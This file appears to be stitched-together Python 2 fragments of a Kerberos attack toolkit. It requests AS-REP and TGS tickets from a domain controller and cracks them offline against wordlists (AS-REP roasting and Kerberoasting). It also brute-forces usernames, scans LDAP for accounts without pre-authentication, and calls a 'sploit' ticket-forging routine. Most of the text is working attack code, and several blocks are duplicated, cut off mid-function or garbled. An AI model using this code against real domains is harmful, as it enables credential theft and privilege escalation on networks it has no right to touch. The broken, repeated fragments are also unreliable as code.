def do_net_get_tgs_rep(self, line):
try:
user_key = (RC4_HMAC, ntlm_hash(krbTricks.set_arg['password']).digest())
krbTricks.set_arg['target_service']
except:
krbTricks.bad_cmd(self, 'net_get_tgs_rep')
return
if len(line) >= 3:
pkt, plaintext_password = line.split(' ', 1)
user_key = (RC4_HMAC, ntlm_hash(plaintext_password).digest())
crack_tgs_rep(user_key, pkt, plaintext_password)
elif 'domain' in krbTricks.set_arg and 'username' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
try:
net_get_user_sid(krbTricks.set_arg['dc'], krbTricks.set_arg['username'], krbTricks.set_arg['domain'] , krbTricks.set_arg['password'], krbTricks.set_arg['username'])
target_service = target_host = kdc_b = None
user_realm = krbTricks.set_arg['domain']
user_name = krbTricks.set_arg['username']
target_realm = krbTricks.set_arg['domain']
user_sid = krbTricks.set_arg['user_sid']
target_service = "krbtgt"
kdc_a = krbTricks.set_arg['dc']
krbTricks.set_arg['pre'] = True
net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, target_realm, target_service, target_host, krbtgt_a_key=None, trust_ab_key=None, target_key=None)
target_service,target_realm = krbTricks.set_arg['target_service'].split('/')
net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, target_realm, target_service, target_host, krbtgt_a_key=None, trust_ab_key=None, target_key=None)
#net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_service, target_host)
krbTricks.set_arg['pre'] = False
except:
print(' Uh-oh, something went wrong :(')
return
else:
krbTricks.bad_cmd(self, 'net_get_tgs_rep')
return
def do_net_get_as_rep(self, line):
# todo dont apend if user exists
krbTricks.set_arg['pre'] = False
if 'domain' in krbTricks.set_arg and 'username' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
if 'pre' in krbTricks.set_arg and 'password' in krbTricks.set_arg and 'user_sid' in krbTricks.set_arg:
if krbTricks.set_arg['pre'] == True:
krbTricks.set_arg['padata_type'] = 2
user_key = (RC4_HMAC, ntlm_hash(krbTricks.set_arg['password']).digest())
user_sid = krbTricks.set_arg['user_sid']
else:
krbTricks.set_arg['padata_type'] = 149
user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
else:
krbTricks.set_arg['padata_type'] = 149
user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
user_realm = krbTricks.set_arg['domain']
user_name = krbTricks.set_arg['username']
kdc_a = krbTricks.set_arg['dc']
try:
padata_type = krbTricks.set_arg['padata_type']
net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
#print rep
if rep[1] == 11:
print " [+] Got a valid AS-REP for %s... Done!" % user_name
krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
if rep[4] == 25:
print " [-] Invalid AS-REP for %s... " % user_name
print " [+] Got a valid user name (%s)... Done!" % user_name
krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt' })
if rep[4] == 18:
print " [-] Invalid AS-REP for %s... " % user_name
print " [+] %s locked... Done!" % user_name
krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt' })
if rep[4] == 6:
print " [-] Not a valid user name (%s)... " % user_name
# principal unknown i.e. not a user
#krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'krbas':krbTricks.set_arg['net_krbas']})
krbTricks.set_arg['padata_type'] = ''
# print "\n #\tAS-REP\tUser"
# for idx, accts in enumerate(krbTricks.loot):
# if 'krbas' in accts:
# gotasrep = 'Yes'
# else:
# gotasrep = 'No'
# print "[%d]\t%s\t%s@%s" % (idx, gotasrep, accts['user_name'], accts['domain'])
# gotasrep = 'No'
show('users')
except:
print(' Uh-oh, something went wrong :(')
return
else:
krbTricks.bad_cmd(self, 'net_get_as_rep')
return
def do_crack_as_rep_manual(self, line):
if 'krbas' in krbTricks.loot[int(line)] and "wordlist" in krbTricks.set_arg:
words = [f.rstrip('\n') for f in open(krbTricks.set_arg['wordlist'])]
for word in words:
user_key = (RC4_HMAC, ntlm_hash(word).digest())
if crack_as_rep(user_key, krbTricks.loot[int(line)]['krbas'], word):
krbTricks.loot[int(line)]['password'] = word
break
# else:
# krbTricks.bad_cmd(self, 'crack_as_rep_manual')
# return
show('users')
def do_crack_tgs_rep(self, line):
for idx, accts in enumerate(krbTricks.loot):
if 'krbtgs' in accts and "wordlist" in krbTricks.set_arg and 'password' not in krbTricks.loot[idx]:
print " Trying to crack %s" % accts['user_name']
words = [f.rstrip('\n') for f in open(krbTricks.set_arg['wordlist'])]
for word in words:
user_key = (RC4_HMAC, ntlm_hash(word).digest())
if crack_tgs_rep(user_key, accts['krbtgs'], word):
krbTricks.loot[idx]['password'] = word
break
# else:
# krbTricks.bad_cmd(self, 'do_crack_tgs_rep')
# return
show('users')
def do_brute_no_pre_auth(self, line):
krbTricks.set_arg['pre'] = False
try:
words = [f.rstrip('\n') for f in open(krbTricks.set_arg['userlist'])]
except:
krbTricks.bad_cmd(self, 'brute_no_pre_auth')
return
for user_name in words:
if 'domain' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
if next((item for item in krbTricks.loot if item["user_name"] == user_name), None):
print ""
else:
krbTricks.set_arg['padata_type'] = 149
user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
user_realm = krbTricks.set_arg['domain']
kdc_a = krbTricks.set_arg['dc']
padata_type = krbTricks.set_arg['padata_type']
try:
net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
except:
print(' can\'t send data to the DC ?\n')
return
try:
krbTricks.set_arg['padata_type'] = ''
rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
#if user_name not in enuberate(krbTricks.loot):
if rep[1] == 11:
krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
if rep[4] == 25:
krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt'})
if rep[4] == 18:
krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt'})
#if rep[4] == 6:
# principal unknown i.e. not a user
#krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'krbas':krbTricks.set_arg['net_krbas']})
except:
print(' [+] Decoding AS-REP from dc.onlyfor.hax... No Ticket\n')
else:
krbTricks.bad_cmd(self, 'brute_no_pre_auth')
return
show('users')
print >> sys.stderr, ' -p <clearPassword>'
print >> sys.stderr, ' --rc4 <ntlmHash>'
sys.exit(1)
opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
opts = dict(opts)
if not all(k in opts for k in ('-u', '-s', '-d')):
usage_and_exit()
user_name, user_realm = opts['-u'].split('@', 1)
user_sid = opts['-s']
kdc_a = opts['-d']
if '--rc4' in opts:
user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
assert len(user_key[1]) == 16
elif '-p' in opts:
user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
else:
user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm)
user_realm = user_realm.upper()
target_realm = target_realm.upper()
sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b,
target_realm, target_service, target_host, filename)
def handleAsReq(data):
req = decode(data, asn1Spec=AsReq())[0]
realm = str(req['req-body']['realm'])
nonce = int(req['req-body']['nonce'])
# Check if it has pre-auth; if not, send error
preAuthData = None
if req['padata'] != None:
for padata in req['padata']:
if padata['padata-type'] == 2:
preAuthData = str(padata['padata-value'])
preAuthData = decode(preAuthData, asn1Spec=EncryptedData())[0]
preAuthData = str(preAuthData['cipher'])
break
if preAuthData == None:
gt, ms = epoch2gt(time(), microseconds=True)
rep = KrbError()
rep['pvno'] = 5
rep['msg-type'] = 30
rep['stime'] = gt
rep['susec'] = ms
rep['error-code'] = 25
rep['crealm'] = realm
rep['cname'] = None
rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
rep['cname']['name-string'] = None
rep['cname']['name-string'][0] = str(req['req-body']['cname']['name-string'][0])
rep['realm'] = realm
rep['sname'] = None
rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
rep['sname']['name-string'] = None
rep['sname']['name-string'][0] = str(req['req-body']['sname']['name-string'][0])
rep['sname']['name-string'][1] = str(req['req-body']['sname']['name-string'][1])
rep['e-text'] = 'Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ'
rep['e-data'] = binascii.unhexlify('30613009a103020110a20204003009a10302010fa20204003009a103020102a2020400300aa1040202008aa2020400300aa10402020088a20204003012a10302010ba20b040930073005a0030201173012a103020113a20b040930073005a003020117')
print "Replying with pre-auth required"
return encode(rep)
# Try to decode preAuthData with valid pws
preAuthIsValid = False
preAuthIsValidPw = None
for pw in valid_pws:
try:
decrypted = decrypt(RC4_HMAC, ntlm_hash(pw).digest(), 1, preAuthData)
preAuthIsValid = True
preAuthIsValidPw = (RC4_HMAC, ntlm_hash(pw).digest())
except: pass
print "Is using a valid pre-auth password: %s" % preAuthIsValid
sname = (str(req['req-body']['sname']['name-string'][0]), str(req['req-body']['sname']['name-string'][1]))
if (sname[0] == 'kadmin' and sname[1] == 'changepw'):
rep = buildAsRep(req, USER_EXP_KEY)
print "Replying with AS response for kadmin/changepw"
else:
if preAuthIsValid:
rep = buildAsRep(req, preAuthIsValidPw)
print "Replying with normal AS-REP"
else:
gt, ms = epoch2gt(time(), microseconds=True)
rep = KrbError()
rep['pvno'] = 5
rep['msg-type'] = 30
rep['stime'] = gt
rep['susec'] = ms
rep['error-code'] = 23
rep['crealm'] = realm
rep['cname'] = None
rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
rep['cname']['name-string'] = None
rep['cname']['name-string'][0] = str(req['req-body']['cname']['name-string'][0])
rep['realm'] = realm
rep['sname'] = None
rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
rep['sname']['name-string'] = None
rep['sname']['name-string'][0] = str(req['req-body']['sname']['name-string'][0])
rep['sname']['name-string'][1] = str(req['req-body']['sname']['name-string'][1])
print "Replying with password expired error"
return encode(rep)
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import protocol, reactor, endpoints
from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from pyasn1.type.char import GeneralString
from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean
from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType
from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep
from kek.util import epoch2gt, gt2epoch
from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash
KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611'))
USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest())
class KrbError(Sequence):
tagSet = application(30)
componentType = NamedTypes(
NamedType('pvno', _c(0, Integer())),
NamedType('msg-type', _c(1, Integer())),
OptionalNamedType('ctime', _c(2, KerberosTime())),
OptionalNamedType('cusec', _c(3, Integer())),
NamedType('stime', _c(4, KerberosTime())),
NamedType('susec', _c(5, Integer())),
NamedType('error-code', _c(6, Integer())),
OptionalNamedType('crealm', _c(7, Realm())),
OptionalNamedType('cname', _c(8, PrincipalName())),
NamedType('realm', _c(9, Realm())),
NamedType('sname', _c(10, PrincipalName())),
print >> sys.stderr, 'OPTIONS:'
print >> sys.stderr, ' -p <clearPassword>'
print >> sys.stderr, ' --rc4 <ntlmHash>'
sys.exit(1)
opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
opts = dict(opts)
if not all(k in opts for k in ('-u', '-s', '-d')):
usage_and_exit()
user_name, user_realm = opts['-u'].split('@', 1)
user_sid = opts['-s']
kdc_a = opts['-d']
if '--rc4' in opts:
user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
assert len(user_key[1]) == 16
elif '-p' in opts:
user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
else:
user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm)
user_realm = user_realm.upper()
target_realm = target_realm.upper()
sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
def handleAsReq(data):
req = decode(data, asn1Spec=AsReq())[0]
realm = str(req['req-body']['realm'])
nonce = int(req['req-body']['nonce'])
# Check if it has pre-auth; if not, send error
preAuthData = None
if req['padata'] != None:
for padata in req['padata']:
if padata['padata-type'] == 2:
preAuthData = str(padata['padata-value'])
preAuthData = decode(preAuthData, asn1Spec=EncryptedData())[0]
preAuthData = str(preAuthData['cipher'])
break
if preAuthData == None:
gt, ms = epoch2gt(time(), microseconds=True)
rep = KrbError()
rep['pvno'] = 5
rep['msg-type'] = 30
rep['stime'] = gt
rep['susec'] = ms
rep['error-code'] = 25
rep['crealm'] = realm
rep['cname'] = None
rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
rep['cname']['name-string'] = None
rep['cname']['name-string'][0] = str(
req['req-body']['cname']['name-string'][0])
rep['realm'] = realm
rep['sname'] = None
rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
rep['sname']['name-string'] = None
rep['sname']['name-string'][0] = str(
req['req-body']['sname']['name-string'][0])
rep['sname']['name-string'][1] = str(
req['req-body']['sname']['name-string'][1])
rep['e-text'] = 'Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ'
rep['e-data'] = binascii.unhexlify(
'30613009a103020110a20204003009a10302010fa20204003009a103020102a2020400300aa1040202008aa2020400300aa10402020088a20204003012a10302010ba20b040930073005a0030201173012a103020113a20b040930073005a003020117'
)
print "Replying with pre-auth required"
return encode(rep)
# Try to decode preAuthData with valid pws
preAuthIsValid = False
preAuthIsValidPw = None
for pw in valid_pws:
try:
decrypted = decrypt(RC4_HMAC,
ntlm_hash(pw).digest(), 1, preAuthData)
preAuthIsValid = True
preAuthIsValidPw = (RC4_HMAC, ntlm_hash(pw).digest())
except:
pass
print "Is using a valid pre-auth password: %s" % preAuthIsValid
sname = (str(req['req-body']['sname']['name-string'][0]),
str(req['req-body']['sname']['name-string'][1]))
if (sname[0] == 'kadmin' and sname[1] == 'changepw'):
rep = buildAsRep(req, USER_EXP_KEY)
print "Replying with AS response for kadmin/changepw"
else:
if preAuthIsValid:
rep = buildAsRep(req, preAuthIsValidPw)
print "Replying with normal AS-REP"
else:
gt, ms = epoch2gt(time(), microseconds=True)
rep = KrbError()
rep['pvno'] = 5
rep['msg-type'] = 30
rep['stime'] = gt
rep['susec'] = ms
rep['error-code'] = 23
rep['crealm'] = realm
rep['cname'] = None
rep['cname']['name-type'] = int(
req['req-body']['cname']['name-type'])
rep['cname']['name-string'] = None
rep['cname']['name-string'][0] = str(
req['req-body']['cname']['name-string'][0])
rep['realm'] = realm
rep['sname'] = None
rep['sname']['name-type'] = int(
req['req-body']['sname']['name-type'])
rep['sname']['name-string'] = None
rep['sname']['name-string'][0] = str(
req['req-body']['sname']['name-string'][0])
rep['sname']['name-string'][1] = str(
req['req-body']['sname']['name-string'][1])
print "Replying with password expired error"
return encode(rep)
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import protocol, reactor, endpoints
from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from pyasn1.type.char import GeneralString
from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean
from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType
from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep
from kek.util import epoch2gt, gt2epoch
from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash
KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611'))
USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest())
class KrbError(Sequence):
tagSet = application(30)
componentType = NamedTypes(
NamedType('pvno', _c(0, Integer())),
NamedType('msg-type', _c(1, Integer())),
OptionalNamedType('ctime', _c(2, KerberosTime())),
OptionalNamedType('cusec', _c(3, Integer())),
NamedType('stime', _c(4, KerberosTime())),
NamedType('susec', _c(5, Integer())),
NamedType('error-code', _c(6, Integer())),
OptionalNamedType('crealm', _c(7, Realm())),
OptionalNamedType('cname', _c(8, PrincipalName())),
NamedType('realm', _c(9, Realm())),
print >> sys.stderr, "OPTIONS:"
print >> sys.stderr, " -p <clearPassword>"
print >> sys.stderr, " --rc4 <ntlmHash>"
sys.exit(1)
opts, args = getopt(sys.argv[1:], "u:s:d:p:", ["rc4="])
opts = dict(opts)
if not all(k in opts for k in ("-u", "-s", "-d")):
usage_and_exit()
user_name, user_realm = opts["-u"].split("@", 1)
user_sid = opts["-s"]
kdc_a = opts["-d"]
if "--rc4" in opts:
user_key = (RC4_HMAC, opts["--rc4"].decode("hex"))
assert len(user_key[1]) == 16
elif "-p" in opts:
user_key = (RC4_HMAC, ntlm_hash(opts["-p"]).digest())
else:
user_key = (RC4_HMAC, ntlm_hash(getpass("Password: "******"TGT_%s@%s.ccache" % (user_name, user_realm)
user_realm = user_realm.upper()
target_realm = target_realm.upper()
sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
def scan_ldap_no_pre_auth(dc, bindusername, binddomain, bindpass):
# todo fix filter, currently static
binddn = bindusername+'@'+binddomain
basedn = "cn=users"
for d in binddomain.split('.'):
basedn += ", dc="+d
try:
# Try and make a synchronous bind
conn = ldap.open(dc)
conn.simple_bind_s(binddn,bindpass)
# Search information
scope = ldap.SCOPE_SUBTREE
filter = "(userAccountControl=4260352)"
#attributes = ['sAMAccountName','memberOf' ]
attributes = ['*' ]
# Search!
result = conn.search_s( basedn, scope, filter, attributes )
for r in result:
print r[1]['sAMAccountName'][0]
#print r[1]
if 'primaryGroupID' in r[1]:
print ' primaryGroupID = '+r[1]['primaryGroupID'][0]
if 'distinguishedName' in r[1]:
print ' distinguishedName = '+r[1]['distinguishedName'][0]
if 'objectSid' in r[1]:
objSid = r[1]['objectSid'][0]
SRL = str(int(binascii.b2a_hex(objSid[0]), 16))
SA = str(int(binascii.b2a_hex(objSid[1]), 16))
IAV = str(int(binascii.b2a_hex(objSid[2:8]), 16))
RIDa = str(int(binascii.b2a_hex(objSid[8:12][::-1]), 16))
RIDb = str(int(binascii.b2a_hex(objSid[12:16][::-1]), 16))
RIDc = str(int(binascii.b2a_hex(objSid[16:20][::-1]), 16))
RIDd = str(int(binascii.b2a_hex(objSid[20:24][::-1]), 16))
RIDe = str(int(binascii.b2a_hex(objSid[24:28][::-1]), 16))
sid = 'S-'+SRL+'-'+IAV+'-'+RIDa+'-'+RIDb+'-'+RIDc+'-'+RIDd+'-'+RIDe
print ' Sid = '+sid
user_sid = sid
else:
user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
if 'badPwdCount' in r[1]:
print ' badPwdCount = '+r[1]['badPwdCount'][0]
if 'givenName' in r[1]:
print ' givenName = '+r[1]['givenName'][0]
krbTricks.set_arg['pre'] = False
user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
try:
net_get_as_rep(binddomain, r[1]['sAMAccountName'][0], user_sid, user_key, dc)
rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
if rep[1] == 11:
print " [+] Got a valid AS-REP for %s... Done!" % r[1]['sAMAccountName'][0]
krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
if rep[4] == 25:
print " [-] Invalid AS-REP for %s... " % r[1]['sAMAccountName'][0]
print " [+] Got a valid user name (%s)... Done!" % r[1]['sAMAccountName'][0]
krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt' })
if rep[4] == 18:
print " [-] Invalid AS-REP for %s... " % r[1]['sAMAccountName'][0]
print " [+] %s locked... Done!" % r[1]['sAMAccountName'][0]
krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt' })
if rep[4] == 6:
print " [-] Not a valid user name (%s)... " % r[1]['sAMAccountName'][0]
# principal unknown i.e. not a user
krbTricks.set_arg['padata_type'] = ''
except:
print(' can\'t send data to the DC ?\n')
# return
show('users')
except ldap.LDAPError as e:
print e
#print >> sys.stderr, ' -p <clearPassword>'
#print >> sys.stderr, ' --rc4 <ntlmHash>'
sys.exit(1)
opts, args = getopt(sys.argv[1:], 'u:d:p:', ['rc4='])
opts = dict(opts)
if not all(k in opts for k in ('-u', '-d')):
usage_and_exit()
user_name, user_realm = opts['-u'].split('@', 1)
#user_sid = opts['-s']
kdc_a = opts['-d']
if '--rc4' in opts:
user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
assert len(user_key[1]) == 16
elif '-p' in opts:
user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
else:
user_key = (RC4_HMAC, ntlm_hash(' ').digest())
target_realm = user_realm
target_service = target_host = kdc_b = None
filename = 'TGT_%s@%s.ccache' % (user_name, user_realm)
user_realm = user_realm.upper()
target_realm = target_realm.upper()
sploit(user_realm, user_name, user_key, kdc_a, kdc_b, target_realm,
target_service, target_host, filename)